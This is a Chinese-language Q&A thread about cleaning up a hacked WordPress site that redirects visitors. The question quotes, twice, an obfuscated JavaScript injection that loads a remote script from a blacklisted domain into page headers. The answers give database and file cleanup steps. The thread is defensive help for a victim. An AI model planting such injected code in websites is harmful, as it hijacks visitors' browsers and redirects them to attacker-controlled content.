如何解决 wordpress 重定向黑客攻击？

Question

我的网站https://spicecarts.in 刚刚被黑了！它正在重定向到其他网站！ 我用这个工具检查了https://sitecheck.sucuri.net/results/https/spicecarts.in 并发现了错误 1.已知的javascript恶意软件：malware.injection?35.27

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type =使用String.fromCharCode（116,101,120,116,47,106,97,118,97,115,99,114,105,112,116）; elem.src =使用String.fromCharCode（104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108 ,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[ 0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

重定向到https://spicecarts.in/

2.此页面包含一个来自letsmakeparty3.ga的JavaScript/iframe，被Sucuri Labs列入黑名单，原因：注入脚本，见https://labs.sucuri.net/?blacklist=letsmakeparty3.ga

https://allow.letsmakeparty3.ga/request?Type=api&query=034/wp-content/plugins/super-progressive-web-apps/public/js/register-sw.js

3.在https://spicecarts.in/wp-includes/css/恶意软件中发现如下

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type =使用String.fromCharCode（116,101,120,116,47,106,97,118,97,115,99,114,105,112,116）; elem.src =使用String.fromCharCode（104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108 ,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[ 0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

如何解决这个问题！

Answer 1

您好，您在数据库中发现并删除病毒。

只需在 table 选项中查看数据库中编码的字符 base 64。

解码任何信息库 64 并将其删除。

Answer 2

首先，冷静下来。我的网站遇到了同样的问题SQL injection attack，这就是我解决它的方法。请务必先backup 你的database。

1. 转到您的phpmyadmin 并打开wp_options 表。将siteurl 和home 的option_value 更新为您网站网址的网址，末尾不带/，例如https://yourwebsite.com。更新后，您现在可以登录您的网站了。

1. 登录您的网站并删除transient 选项，您可以使用wp-optimize 插件删除transient 选项，如下所示：

1. 总之，您需要做的是清理您的database。有插件可以进行这种清理。您也可以在您的 database 中搜索 letsmakeparty3 并将其删除。

Answer 3

您还需要确保清除网站上的所有潜在恶意软件。您可以将网站提交给专业服务机构进行清洁，也可以尝试自己进行清洁。如上所述，您将需要清理数据库。您还需要检查受感染的文件。如果您的主题和插件文件的干净版本存储在备份或本地计算机上，那可能是一个不错的起点。确保网站上的所有内容都已更新（过时的插件通常 = 漏洞）。如果它重定向到letsmakeparty3，那么值得检查一下MU插件rms_unique_wp_mu_pl_fl_nm是否已添加到您的站点。干杯！